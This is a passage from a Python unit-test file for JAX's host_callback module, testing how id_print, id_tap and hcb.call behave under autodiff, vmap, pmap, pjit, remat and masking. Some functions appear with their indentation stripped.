    hcb.barrier_wait()
    expected = """
        what: x,x^2
        ( 3. 9. )
        transforms: ['jvp', 'transpose'] what: x,x^2
        ( 0. 3. )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()
    print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
    hcb.barrier_wait()
    expected = """
        transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
        ( [2. 3.] [4. 9.] )
        transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (None, 0)})] what: x,x^2
        ( 0. [2. 3.] )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
  def test_tap_transforms_doc(self):
    """Documentation examples for id_print under transforms (new behavior).

    With --jax_host_callback_ad_transforms off, id_print taps only primal
    values; tangents/cotangents must be tapped explicitly via the
    custom_jvp/custom_vjp helpers defined inline below.
    """
    # Examples from the documentation
    if FLAGS.jax_host_callback_ad_transforms:
      raise unittest.SkipTest("disabled for old behavior")
    def power3(x):
      y = x * x
      # Print both 'x' and 'x^2'. Must pack as a tuple.
      hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
      return y * x

    print(f"impl = {power3(3.)}")
    hcb.barrier_wait()
    expected = """
        what: x,x^2
        ( 3. 9. )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()

    print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
    hcb.barrier_wait()
    # Under jvp only the primal values are tapped in the new behavior.
    expected = """
        what: x,x^2
        ( 3. 9. )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()

    @jax.custom_jvp
    def print_tangents(arg):
      return None

    @print_tangents.defjvp
    def print_tangents_jvp(primals, tangents):
      arg_dot, = tangents
      hcb.id_print(arg_dot, what="tangents", output_stream=testing_stream)
      return primals, tangents

    def power3_with_tangents(x):
      y = x * x
      # Print both 'x' and 'x^2'. Must pack as a tuple.
      hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
      print_tangents((x, y))
      return y * x

    print(f"jvp = {jax.jvp(power3_with_tangents, (3.,), (0.1,))}")
    hcb.barrier_wait()
    expected = """
        what: x,x^2
        ( 3. 9. )
        what: tangents
        ( 0.1 0.6 )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()

    print(f"grad = {jax.grad(power3)(3.)}")
    hcb.barrier_wait()
    # Only the primals by default
    expected = """
        what: x,x^2
        ( 3. 9. )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()

    @jax.custom_vjp
    def print_cotangents(arg):
      # Must return the argument for which we want the cotangent.
      return arg

    # f_fwd: a -> (b, residual)
    def print_cotangents_fwd(arg):
      return print_cotangents(arg), None
    # f_bwd: (residual, CT b) -> [CT a]
    def print_cotangents_bwd(residual, ct_b):
      hcb.id_print(ct_b, what="cotangents", output_stream=testing_stream)
      return ct_b,

    print_cotangents.defvjp(print_cotangents_fwd, print_cotangents_bwd)

    def power3_with_cotangents(x):
      y = x * x
      # Print both 'x' and 'x^2'. Must pack as a tuple.
      hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
      # Must use the output of print_cotangents
      (x1, y1) = print_cotangents((x, y))
      return y1 * x1

    print(f"grad = {jax.grad(power3_with_cotangents)(3.)}")
    hcb.barrier_wait()
    expected = """
        what: x,x^2
        ( 3. 9. )
        what: cotangents
        ( 9. 3. )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()

    # TODO: grad of grad

    print(f"vmap = {jax.vmap(power3)(np.array([2., 3.]))}")
    hcb.barrier_wait()
    expected = """
        transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
        ( [2. 3.] [4. 9.] )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()

    print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
    hcb.barrier_wait()
    expected = """
        transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
        ( [2. 3.] [4. 9.] )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()

    print(f"vmap o grad {jax.vmap(jax.grad(power3_with_cotangents))(np.array([2., 3.]))}")
    hcb.barrier_wait()
    expected = """
        transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
        ( [2. 3.] [4. 9.] )
        transforms: [('batch', {'batch_dims': (0, 0)})] what: cotangents
        ( [4. 9.] [2. 3.] )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()

    print(f"grad o remat = {jax.grad(lambda x: power3(ad_checkpoint.checkpoint(power3)(x)))(3.)}")
    hcb.barrier_wait()
    # remat replays the forward pass during the backward pass, so the inner
    # power3 taps twice (once at 3., once during the replay).
    expected = """
        what: x,x^2
        ( 3. 9. )
        what: x,x^2
        ( 27. 729. )
        what: x,x^2
        ( 3. 9. )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()
  def test_tap_pmap(self):
    """Each pmap device taps its own shard, labeled with its device."""
    if len(local_devices()) < 2:
      raise SkipTest("test requires at least 2 devices")

    def power3(x):
      y = x * x
      # Print both 'x' and 'x^2'. Must pack as a tuple.
      _, y = hcb.id_print((x, y),
                          what="x,x^2",
                          output_stream=testing_stream,
                          tap_with_device=True)
      return y * x

    pmap_power3 = jax.pmap(power3, devices=local_devices())
    xv = np.array([3, 4], dtype=np.int32)
    res = pmap_power3(xv)
    hcb.barrier_wait()
    self.assertAllClose(xv * xv * xv, res, check_dtypes=False)
    # Assertion text is for 2 devices (also works for 1 device)
    assertMultiDeviceOutputEqual(
        self, """
        device: cpu:0 what: x,x^2
        ( 3 9 )
        device: cpu:1 what: x,x^2
        ( 4 16 )""")
  def test_tap_pmap_vmap(self):
    """vmap inside pmap: each device taps its whole batched row."""
    # A matrix M[ij] = i * 10 + j
    nr_devices = len(local_devices())
    shape = (nr_devices, 3)
    matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
                             dtype=np.int32)

    def fun1(x, do_print=False):  # x: i32
      return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)

    pmap_vmap_fun1 = jax.pmap(
        jax.vmap(partial(fun1, do_print=True)), devices=local_devices())

    res = pmap_vmap_fun1(matrix)
    hcb.barrier_wait()
    expected_res = jax.pmap(
        jax.vmap(partial(fun1, do_print=False)), devices=local_devices())(
            matrix)
    self.assertAllClose(expected_res, res, check_dtypes=False)
    # Assertion text is for 2 devices (also works for 1 device)
    assertMultiDeviceOutputEqual(self, """
        device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
        [0.00 2.00 4.00]
        device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
        [20.00 22.00 24.00]""")
  def test_tap_pmap_pmap_vmap(self):
    """Nested pmap-of-pmap-of-vmap: taps carry only the batch transform."""
    # A matrix M[ijk] = i * 100 + j * 10 + k
    nr_devices = len(local_devices())
    if nr_devices % 2 != 0:
      raise SkipTest("test works only on even number of devices")
    shape = (2, nr_devices // 2, 3)
    matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
                             dtype=np.float32)

    def fun1(x, do_print=False):  # x: f32
      y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
      return y ** 2

    pmap_fun1 = jax.pmap(
        jax.pmap(jax.vmap(partial(fun1, do_print=True))),
        devices=local_devices())
    res = pmap_fun1(matrix)
    hcb.barrier_wait()
    expected_res = jax.pmap(
        jax.pmap(jax.vmap(partial(fun1, do_print=False))),
        devices=local_devices())(
            matrix)
    self.assertAllClose(expected_res, res, check_dtypes=False)
    # Assertion text is for 2 devices (also works for 1 device)
    assertMultiDeviceOutputEqual(self, """
        device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
        [0.00 2.00 4.00]
        device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
        [200.00 202.00 204.00]""")
  @ignore_jit_of_pmap_warning()
  def test_tap_pmap_pmap_extra(self):
    """pmap of a pmap surrounded by extra code."""
    # A matrix M[ijk] = i * 100 + j * 10 + k (shape (2, 1, 3))
    nr_devices = len(local_devices())
    if nr_devices != 2:
      raise SkipTest("test works only on 2 devices")
    shape = (2, 1, 3)
    matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
                             dtype=np.float32)

    def fun(xv, do_print=False):
      # This will be printed on all devices, with shape [1, 3]
      xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
      res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
      # This will be printed on all devices, with shape [1, 3]
      return maybe_print(do_print, res + 1., "after", tap_with_device=True)

    res = jax.pmap(partial(fun, do_print=True))(matrix)
    self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
    hcb.barrier_wait()
    # Assertion text is for 2 devices (also works for 1 device)
    assertMultiDeviceOutputEqual(self, """
        device: cpu:0 what: before
        [[1.00 2.00 3.00]]
        device: cpu:0 what: inside
        [2.00 4.00 6.00]
        device: cpu:0 what: after
        [[3.00 5.00 7.00]]
        device: cpu:1 what: before
        [[101.00 102.00 103.00]]
        device: cpu:1 what: inside
        [202.00 204.00 206.00]
        device: cpu:1 what: after
        [[203.00 205.00 207.00]]""")
  def test_tap_jvp_pmap_vmap(self):
    """jvp over pmap over vmap; tangents appear only in the old AD mode."""
    # A matrix M[ijk] = i * 100 + j * 10 + k
    nr_devices = len(local_devices())
    shape = (nr_devices, 2, 3)
    matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
                             dtype=np.float32)

    def fun(xv, do_print=False):
      # x: f32[3]
      return jax.jvp(jax.pmap(jax.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
                     (xv,), (.1 * jnp.ones_like(xv),))

    res = fun(matrix, do_print=True)
    hcb.barrier_wait()
    expected_res = fun(matrix, do_print=False)
    self.assertAllClose(expected_res, res, check_dtypes=False)
    # Assertion text is for 2 devices (also works for 1 device)
    # Device 0 will get to execute jax.jvp(jax.vmap(...)) for matrix[0, :, :]
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiDeviceOutputEqual(self, """
        device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
        ( [[ 0.00 2.00 4.00]
        [20.00 22.00 24.00]] [[0.20 0.20 0.20]
        [0.20 0.20 0.20]] )
        device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
        ( [[200.00 202.00 204.00]
        [220.00 222.00 224.00]] [[0.20 0.20 0.20]
        [0.20 0.20 0.20]] )""")
    else:
      assertMultiDeviceOutputEqual(self, """
        device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
        [[ 0.00 2.00 4.00]
        [20.00 22.00 24.00]]
        device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
        [[200.00 202.00 204.00]
        [220.00 222.00 224.00]]""")
  def test_tap_vmap_pmap(self):
    """vmap over pmap: each device taps the vmapped slice it owns."""
    # A matrix M[ijk] = i * 100 + j * 10 + k
    nr_devices = len(local_devices())
    shape = (2, nr_devices, 3)
    matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
                             dtype=np.float32)

    def fun(xv, do_print=False):
      # x: f32[3]
      return jax.vmap(jax.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)

    res = fun(matrix, do_print=True)
    hcb.barrier_wait()
    expected_res = fun(matrix, do_print=False)
    self.assertAllClose(expected_res, res, check_dtypes=False)
    # Assertion text is for 2 devices (also works for 1 device)
    # Device 0 will get to execute jax.vmap(...) for matrix[:, 0, :]
    assertMultiDeviceOutputEqual(self, """
        device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
        [[ 0.00 2.00 4.00]
        [200.00 202.00 204.00]]
        device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
        [[ 20.00 22.00 24.00]
        [220.00 222.00 224.00]]""")
  @ignore_jit_of_pmap_warning()
  def test_tap_jit_pmap_extra(self):
    """jit of a pmap surrounded by extra code."""
    # A matrix M[ij] = i * 10 + j
    nr_devices = len(local_devices())
    assert nr_devices in (1, 2)
    shape = (nr_devices, 3)
    matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
                             dtype=np.float32)

    def fun(xv, do_print=False):
      # This will be printed on all devices with shape (nr_devices, 3)
      xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
      res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
      # This will be printed on all devices with shape (nr_devices, 3)
      return maybe_print(do_print, res + 1., "after", tap_with_device=True)

    res = jax.jit(partial(fun, do_print=True))(matrix)
    self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
    hcb.barrier_wait()
    # The "before"/"after" taps are outside the pmap, so every device reports
    # the full replicated array; "inside" reports only the device's shard.
    if len(local_devices()) == 2:
      assertMultiDeviceOutputEqual(self, """
        device: cpu:0 what: before
        [[ 1.00 2.00 3.00]
        [11.00 12.00 13.00]]
        device: cpu:0 what: inside
        [2.00 4.00 6.00]
        device: cpu:0 what: after
        [[ 3.00 5.00 7.00]
        [23.00 25.00 27.00]]
        device: cpu:1 what: before
        [[ 1.00 2.00 3.00]
        [11.00 12.00 13.00]]
        device: cpu:1 what: inside
        [22.00 24.00 26.00]
        device: cpu:1 what: after
        [[ 3.00 5.00 7.00]
        [23.00 25.00 27.00]]""")
    else:
      assert len(local_devices()) == 1
      assertMultiDeviceOutputEqual(self, """
        device: cpu:0 what: before
        [[1.00 2.00 3.00]]
        device: cpu:0 what: inside
        [2.00 4.00 6.00]
        device: cpu:0 what: after
        [[3.00 5.00 7.00]]""")
@unittest.skip("cond of pmap does not work in JAX. Issue #5178.")
def test_tap_cond_pmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, jax.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
  @jtu.skip_on_devices("cpu", "gpu")
  # TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
  def test_tap_pjit(self):
    """A tap inside pjit yields a single callback with the full array."""
    devices = np.array(local_devices())
    nr_devices = len(devices)
    if nr_devices < 2:
      raise SkipTest("test requires at least 2 devices")

    print(f"test_tap_pjit is running on devices {devices}.")
    # x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
    # y: i32[3, 4]
    x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
    y = jnp.ones((3, 4), np.int32)

    @partial(jax.named_call, name="fun1")  # for xprof debugging
    def fun1(x, do_print=False):
      z = jnp.dot(x, y)
      return maybe_print(do_print, z, "z", tap_with_device=True)

    res0 = fun1(x, do_print=False)
    pjit_fun1 = pjit.pjit(
        partial(fun1, do_print=True),
        in_axis_resources=(P("d"),),
        out_axis_resources=P("d"))

    with maps.Mesh(devices, ["d"]):
      # Print the internal IR
      helper_log_ir(
          f"{self._testMethodName}.pjit",
          pjit_fun1,
          x,
          num_partitions=nr_devices)
      res = pjit_fun1(x)

    self.assertAllClose(res0, res)
    hcb.barrier_wait("before check")

    # Assertion text is for 2 devices (also works for 1 device)
    # Note that a single call is made.
    assertMultiDeviceOutputEqual(
        self, """
        device: cpu:0 what: z
        [[ 3 3 3 3]
        [33 33 33 33]]""")
  def test_tap_scan_custom_jvp(self):
    """custom JVP, inside scan.
    This exercises the custom_jvp_call_jaxpr primitives."""

    @jax.custom_jvp
    def f(x):
      return x * hcb.id_print(x, output_stream=testing_stream, what="x")

    @f.defjvp
    def f_jvp(primals, tangents):
      x, = primals
      x_dot, = tangents
      primal_out = f(x)
      tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
      return primal_out, tangent_out

    def g(x):
      # Sum f(x_i)
      return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
                      np.full(x.shape[1:], 0.),  # Like x w/o leading dim
                      x)[0]

    arg = np.full((2,), 0.7)
    self.assertAllClose(0.7 * 0.7 * 2, g(arg))
    hcb.barrier_wait()
    self.assertMultiLineStrippedEqual("""
        what: x
        0.7
        what: x
        0.7""", testing_stream.output)
    testing_stream.reset()

    self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
    hcb.barrier_wait()
    # grad transposes the custom JVP, so x_dot taps appear with 'transpose'.
    self.assertMultiLineStrippedEqual("""
        what: x
        0.7
        what: x
        0.7
        transforms: ['transpose'] what: x_dot
        2.1
        transforms: ['transpose'] what: x_dot
        2.1""", testing_stream.output)
  def test_tap_scan_custom_vjp(self):
    """custom VJP, inside scan.
    This exercises the custom_vjp_call_jaxpr primitives."""

    @jax.custom_vjp
    def f(x):
      return x * hcb.id_print(x, output_stream=testing_stream, what="x")

    # f_fwd: a -> (b, residual)
    def f_fwd(x):
      return f(x), 3. * x
    # f_bwd: (residual, CT b) -> [CT a]
    def f_bwd(residual, ct_b):
      return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),

    f.defvjp(f_fwd, f_bwd)

    def g(x):
      # Sum f(x_i)
      return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
                      np.full(x.shape[1:], 0.),  # Like x w/o leading dim
                      x)[0]

    arg = np.full((2,), 0.7)
    self.assertAllClose(0.7 * 0.7 * 2, g(arg))
    hcb.barrier_wait()
    self.assertMultiLineStrippedEqual("""
        what: x
        0.7
        what: x
        0.7""", testing_stream.output)
    testing_stream.reset()

    self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
    hcb.barrier_wait()
    # The custom bwd taps the incoming cotangents (1. for each scan step).
    self.assertMultiLineStrippedEqual("""
        what: x
        0.7
        what: x
        0.7
        what: ct_b
        1.
        what: ct_b
        1.""", testing_stream.output)
  def test_tap_mask(self):
    """Taps under jax.mask, also composed with vmap, jvp, and jit."""

    @partial(jax.mask, in_shapes=['n'], out_shape='')
    def padded_sum(x):
      three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
                             output_stream=testing_stream)
      return jnp.sum(three_x)

    x = np.arange(5.)

    self.assertAllClose(9., padded_sum([x], dict(n=3)))
    hcb.barrier_wait()
    # The tap reports the padded physical values plus the logical shapes.
    self.assertMultiLineStrippedEqual("""
        transforms: [('mask', {'logical_shapes': 5})] what: x
        ( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
                                      testing_stream.output)
    testing_stream.reset()

    # With VMAP
    xv = np.arange(10.).reshape((2, 5))  # logical_shape = 5
    self.assertAllClose(
        np.array([9., 78.]),
        # batch_size = 2, n=3 and 4 for the two elements
        jax.vmap(padded_sum)([xv],
                             dict(n=np.array([3., 4.]))))
    hcb.barrier_wait()
    self.assertMultiLineStrippedEqual("""
        transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
        ( ( [[0. 1. 2. 3. 4.]
        [5. 6. 7. 8. 9.]]
        [[ 0. 2. 4. 6. 8.]
        [10. 12. 14. 16. 18.]] )
        ( ( [3. 4.] ) ( [3. 4.] ) ) )""", testing_stream.output)
    testing_stream.reset()

    # With JVP
    self.assertAllClose((9., 0.9),
                        jax.jvp(lambda arg: padded_sum([arg], dict(n=3)),
                                (x,), (x * 0.1,)))
    hcb.barrier_wait()
    if FLAGS.jax_host_callback_ad_transforms:
      self.assertMultiLineStrippedEqual("""
          transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
          ( ( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )
          ( ( [0. 0.1 0.2 0.3 0.4] [0. 0.2 0.4 0.6 0.8] ) ( ( False ) ( False ) ) ) )""",
                                        testing_stream.output)
    else:
      self.assertMultiLineStrippedEqual("""
          transforms: [('mask', {'logical_shapes': 5})] what: x
          ( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
                                        testing_stream.output)
    testing_stream.reset()

    # Now with JIT
    self.assertAllClose(9., jax.jit(padded_sum)([x], dict(n=3)))
    hcb.barrier_wait()
    self.assertMultiLineStrippedEqual("""
        transforms: [('mask', {'logical_shapes': 5})] what: x
        ( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
                                      testing_stream.output)
def test_tap_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what=f"x times {i}", output_stream=testing_stream)
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait("first")
expected = """
what: x times 1
[[0. 1. 2.]
[3. 4. 5.]]
what: x times 2
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times 3
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait("second")
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
  def test_tap_error_bad_consumer_id(self):
    """Try to use reserved consumer ID 0.
    Check that we get the proper error from the runtime."""
    if not hcb._use_outfeed(jtu.device_under_test()):
      raise SkipTest("test works only for outfeed")
    comp = xla_client.XlaBuilder(self._testMethodName)
    token = hcb.xops.CreateToken(comp)
    hcb._initialize_outfeed_receiver()  # Needed if this is the sole test
    with self.assertRaisesRegex(RuntimeError,
                                "Consumer ID cannot be a reserved value: 0"):
      # Consumer ID 0 is reserved by the outfeed receiver runtime.
      hcb._callback_handler_data.receiver.add_outfeed(
          comp, token, 0,
          [xops.Constant(comp, np.zeros((2, 3), dtype=np.float32))])
  def test_tap_error_different_shapes(self):
    """Try to register different shapes for the same consumer ID."""
    if not hcb._use_outfeed(jtu.device_under_test()):
      raise SkipTest("test works only for outfeed")
    comp = xla_client.XlaBuilder(self._testMethodName)
    token = hcb.xops.CreateToken(comp)
    hcb._initialize_outfeed_receiver()  # Needed if this is the sole test
    # First registration for consumer ID 123 fixes its shape: f32[2, 3].
    hcb._callback_handler_data.receiver.add_outfeed(
        comp, token, 123,
        [xops.Constant(comp, np.zeros((2, 3), dtype=np.float32))])
    # A different dtype for the same consumer ID must be rejected.
    with self.assertRaisesRegex(
        RuntimeError, ".*does not match previous shape element_type.*"):
      hcb._callback_handler_data.receiver.add_outfeed(
          comp, token, 123,
          [xops.Constant(comp, np.zeros((2, 3), dtype=np.int32))])
    # A different rank/shape must also be rejected.
    with self.assertRaisesRegex(
        RuntimeError, ".*does not match previous shape element_type.*"):
      hcb._callback_handler_data.receiver.add_outfeed(
          comp, token, 123,
          [xops.Constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_tap_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
jax.grad(loss)(1.0) # should not fail
  def test_tap_remat_0(self):
    """A tap inside a remat-ed body driven by lax.fori_loop."""

    def f(i, k):
      x = hcb.id_print(k + i, output_stream=testing_stream)
      return k * x

    def loss(k):
      return lax.fori_loop(0, 2, jax.remat(f), k)

    print(loss(3))
    hcb.barrier_wait()
    # Taps: iteration 0 prints k+0=3, iteration 1 prints 3*3+1=10.
    expected = """
      3
      10"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
  @parameterized.named_parameters(
      jtu.cases_from_list(
          dict(testcase_name=f"_use_remat={use_remat}_{grad_func}_use_result={use_result}",
               use_result=use_result, use_remat=use_remat, grad_func=grad_func)
          for use_result in [True, False]
          for grad_func in ["grad", "value_and_grad"]
          for use_remat in ["old", "new", "none"]))
  def test_tap_remat(self, use_result=False, grad_func="grad", use_remat="new"):
    """Taps under old/new/no remat combined with grad/value_and_grad."""

    def f(x):
      id_print_result = hcb.id_print(x, output_stream=testing_stream)
      if use_result:
        x = id_print_result
      return 3. * x

    grad_f = jax.grad if grad_func == "grad" else jax.value_and_grad
    if use_remat == "old":
      trans_f = jax.remat(f)
    elif use_remat == "new":
      trans_f = ad_checkpoint.checkpoint(f)
    else:
      assert use_remat == "none"
      trans_f = f
    print(jax.make_jaxpr(grad_f(trans_f))(2.))
    grad_f(trans_f)(2.)

    hcb.barrier_wait()

    if use_remat == "none":
      if use_result:
        if FLAGS.jax_host_callback_ad_transforms:
          expected = """
            2.
            transforms: ['jvp', 'transpose']
            3."""
        else:
          # GOOD: whether or not we use_result, in absence of
          # jax_host_callback_ad_transforms we get the same callback.
          expected = "2."
      else:
        expected = "2."
    else:  # use_remat
      if use_result:
        if FLAGS.jax_host_callback_ad_transforms:
          expected = """
            2.
            2.
            transforms: ['jvp', 'transpose']
            3."""
        else:
          expected = """
            2.
            2."""
      else:
        if use_remat == "old":
          # TODO: we should see two callbacks
          expected = ""
        else:
          # Good: we see two callbacks, whether or not we use the result.
          expected = """
            2.
            2."""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
  def test_tap_named_call(self):
    """Taps work inside a jax.named_call body, here driven by lax.scan."""

    def tap_scalar(init, do_print=False):
      @partial(jax.named_call, name="step")
      def step(acc, step_nr):
        acc = acc + step_nr
        maybe_print(do_print, step_nr, what="step_nr")
        return acc, None

      return lax.scan(step, init, np.arange(2))

    self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
    hcb.barrier_wait()
    expected = """
      what: step_nr
      0
      what: step_nr
      1"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(x):
return 2 * x
def fun(x):
y = hcb.call(f_outside, x + 1, result_shape=x)
return 3 * (1 + y)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(3 * (1 + 2 * (arg + 1)), fun(arg))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_{np.dtype(dtype).name}", dtype=dtype)
for dtype in jtu.dtypes.all
if dtype != np.bool_))
def test_call_types(self, dtype=np.float64):
def f_outside(x):
# Use x + x to ensure that the result type is the same
return x + x
def fun(x):
return hcb.call(f_outside, x + x, result_shape=x)
arg = np.arange(24, dtype=dtype).reshape((2, 3, 4))
self.assertAllClose(arg + arg + arg + arg, fun(arg), check_dtypes=True)
def test_call_types_bool(self, dtype=np.float64):
def f_outside(x):
return np.invert(x)
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = self.rng().choice(a=[True, False], size=(2, 3, 4))
self.assertAllClose(np.invert(arg), fun(arg))
def test_call_tuples(self):
def f_outside(args):
x, y = args
return y, x # Swap the tuple
def fun(x):
xy = hcb.call(f_outside, (x, x + 1), result_shape=(x, x))
return 2 * xy[0] + 3 * xy[1]
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(2 * (arg + 1) + 3 * arg, fun(arg))
def test_call_empty_arg(self):
"""Call with empty array."""
result = np.ones((2,), dtype=np.float32)
def f_outside(_):
return result
def fun(x):
return x + hcb.call(f_outside, (),
result_shape=jax.ShapeDtypeStruct(result.shape, result.dtype))
self.assertAllClose(2. + result, fun(2.))
def test_call_empty_result(self):
"""Call returning empty array."""
result_shape = (2, 0)
def f_outside(_):
return np.ones(result_shape, dtype=np.float32)
def fun(x):
return x + hcb.call(f_outside, 1.,
result_shape=jax.ShapeDtypeStruct(result_shape, np.float32))
self.assertAllClose(f_outside(0.), fun(2.))
def test_call_empty_result_inside_pytree(self):
"""Call returning a tuple with an empty array and a non-empty one."""
result_shape_0 = (2, 0)
result_shape_2 = (0,)
def f_outside(_):
return (np.ones(result_shape_0, dtype=np.float32),
np.ones((1,), dtype=np.float32),
np.ones(result_shape_2, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
